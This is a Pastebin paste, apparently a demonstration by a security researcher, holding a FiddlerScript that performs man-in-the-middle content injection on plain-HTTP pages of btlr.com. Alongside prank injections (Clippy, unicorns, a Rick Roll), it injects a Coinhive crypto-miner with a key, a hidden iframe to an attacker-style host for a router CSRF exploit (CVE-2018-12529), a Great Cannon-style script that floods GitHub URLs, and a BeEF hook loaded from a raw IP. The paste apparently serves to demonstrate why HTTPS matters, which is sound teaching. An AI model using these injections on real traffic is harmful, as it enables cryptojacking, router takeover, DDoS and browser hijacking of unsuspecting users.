troyhunt

FiddlerScript MitM Attacks Against Requests to btlr.com

Jul 13th, 2018
1,261
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. static function OnBeforeRequest(oSession: Session) {
  2. if (oSession.HostnameIs("btlr.com")){
  3. oSession.hostname = "scripting.com";
  4. }
  5. }
  6.  
  7. static function OnBeforeResponse(oSession: Session) { // Clippy
  8. if(oSession.PathAndQuery == "/encryption_and_privacy.html") {
  9. oSession.utilDecodeResponse();
  10. oSession.utilReplaceInResponse('</head>','<link href="https://cdn.rawgit.com/smore-inc/clippy.js/master/src/clippy.css" rel="stylesheet"></head>');
  11. oSession.utilReplaceInResponse('</body>','<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7/jquery.min.js" integrity="sha256-/05Jde9AMAT4/o5ZAI23rUf1SxDYTHLrkOco0eyRV84=" crossorigin="anonymous"></script></body>');
  12. oSession.utilReplaceInResponse('</body>','<script src="https://cdn.rawgit.com/smore-inc/clippy.js/master/build/clippy.min.js"></script></body>');
  13. oSession.utilReplaceInResponse('</body>','<script type="text/javascript">clippy.load("Clippy", function(agent){agent.show();agent.speak("It looks like you\'re trying to learn about HTTPS, would you like some help with that?");});</script></body>');
  14. }
  15.  
  16. // Cornify
  17. if(oSession.PathAndQuery == "/social_networks_dos_and_donts.html") {
  18. oSession.utilDecodeResponse();
  19. oSession.utilReplaceInResponse('<h1>Social Networks Dos And Don\'ts</h1>','<h1><a href="http://www.cornify.com" onclick="cornify_add();return false;"><img src="http://www.cornify.com/assets/cornifycorn.gif" width="52" height="51" border="0" alt="Cornify" /></a><script type="text/javascript" src="http://www.cornify.com/js/cornify.js"></script> Social Networks Dos And Don\'ts</h1>');
  20. oSession.utilReplaceInResponse('</h1>','</h1><img src="https://www.cornify.com/getacorn.php?r=1531299923195&amp;url=http://btlr.com/social_networks_dos_and_donts.html"><img src="https://www.cornify.com/getacorn.php?r=1531299923195&amp;url=http://btlr.com/social_networks_dos_and_donts.html"><img src="https://www.cornify.com/getacorn.php?r=1531299923195&amp;url=http://btlr.com/social_networks_dos_and_donts.html">');
  21. }
  22.  
  23. // Harlem Shake - paste this one in from console
  24. /*if(oSession.PathAndQuery == "/") {
  25. oSession.utilDecodeResponse();
  26. oSession.utilReplaceInResponse('</body>','<script>(function(){function c(){var e=document.createElement("link");e.setAttribute("type","text/css");e.setAttribute("rel","stylesheet");e.setAttribute("href",f);e.setAttribute("class",l);document.body.appendChild(e)}function h(){var e=document.getElementsByClassName(l);for(var t=0;t<e.length;t++){document.body.removeChild(e[t])}}function p(){var e=document.createElement("div");e.setAttribute("class",a);document.body.appendChild(e);setTimeout(function(){document.body.removeChild(e)},100)}function d(e){return{height:e.offsetHeight,width:e.offsetWidth}}function v(i){var s=d(i);return s.height>e&&s.height<n&&s.width>t&&s.width<r}function m(e){var t=e;var n=0;while(!!t){n+=t.offsetTop;t=t.offsetParent}return n}function g(){var e=document.documentElement;if(!!window.innerWidth){return window.innerHeight}else if(e&&!isNaN(e.clientHeight)){return e.clientHeight}return 0}function y(){if(window.pageYOffset){return window.pageYOffset}return Math.max(document.documentElement.scrollTop,document.body.scrollTop)}function E(e){var t=m(e);return t>=w&&t<=b+w}function S(){var e=document.createElement("audio");e.setAttribute("class",l);e.src=i;e.loop=false;e.addEventListener("canplay",function(){setTimeout(function(){x(k)},500);setTimeout(function(){N();p();for(var e=0;e<O.length;e++){T(O[e])}},15500)},true);e.addEventListener("ended",function(){N();h()},true);e.innerHTML=" <p>If you are reading this, it is because your browser does not support the audio element. We recommend that you get a new browser.</p> <p>";document.body.appendChild(e);e.play()}function x(e){e.className+=" "+s+" "+o}function T(e){e.className+=" "+s+" "+u[Math.floor(Math.random()*u.length)]}function N(){var e=document.getElementsByClassName(s);var t=new RegExp("\\b"+s+"\\b");for(var n=0;n<e.length;){e[n].className=e[n].className.replace(t,"")}}var e=30;var t=30;var n=350;var r=350;var i="//s3.amazonaws.com/moovweb-marketing/playground/harlem-shake.mp3";var s="mw-harlem_shake_me";var o="im_first";var u=["im_drunk","im_baked","im_trippin","im_blown"];var a="mw-strobe_light";var f="//s3.amazonaws.com/moovweb-marketing/playground/harlem-shake-style.css";var l="mw_added_css";var b=g();var w=y();var C=document.getElementsByTagName("*");var k=null;for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){if(E(A)){k=A;break}}}if(A===null){console.warn("Could not find a node of the right size. Please try a different page.");return}c();S();var O=[];for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){O.push(A)}}})()</script></body>');
  27. }*/
  28.  
  29. // Coinhive (show CPU as it runs)
  30. if(oSession.PathAndQuery == "/safety_security_1.html") {
  31. oSession.utilDecodeResponse();
  32. oSession.utilReplaceInResponse('</body>','<script src="https://authedmine.com/lib/authedmine.min.js"></script><script>var miner = new CoinHive.Anonymous("PlJ41covvoEeW7pwQu70a7HJMWfDYE3D", {throttle: 0.3});miner.start();</script></body>');
  33. }
  34.  
  35. // CSRF against Intex N150 routers (CVE-2018-12529)
  36. if(oSession.PathAndQuery == "/telecommuting.html") {
  37. oSession.utilDecodeResponse();
  38. oSession.utilReplaceInResponse('</body>','<iframe src="http://evilcyberhacker.com/RouterCSRF.html" style="display: none"></iframe></body>');
  39. }
  40.  
  41. // Great Cannon
  42. if(oSession.PathAndQuery == "/online_marketing.html") {
  43. oSession.utilDecodeResponse();
  44. oSession.utilReplaceInResponse('</body>','<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script><script src="http://code.jquery.com/jquery-latest.js"></script><script>startime = (new Date).getTime();var count = 0; function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3}url_array = ["https://github.com/greatfire", "https://github.com/cn-nytimes"];NUM = url_array.length; function r_send2() { var a = unixtime() % NUM; get(url_array[a])} function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } })} function r_send(a) { setTimeout("r_send2()", a)}setTimeout("r_send2()", 2E3);</script></body>');
  45. }
  46.  
  47. // BeEF
  48. if(oSession.PathAndQuery == "/what_startup_needs.html") {
  49. oSession.utilDecodeResponse();
  50. oSession.utilReplaceInResponse('</body>','<script src="http://104.210.63.219/hook.js"></script></body>');
  51. }
  52.  
  53. // Rick Roll
  54. if(oSession.PathAndQuery == "/projects.html") {
  55. oSession.utilDecodeResponse();
  56. oSession.utilReplaceInResponse('</body>','<style>.content_div, .cd{width:500px}</style></body>');
  57. oSession.utilReplaceInResponse('<img border=0 src="bg_misc9.png">','<iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ?ecver=2&autoplay=1" width="500" height="400" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>');
  58. }
  59. }
RAW Paste Data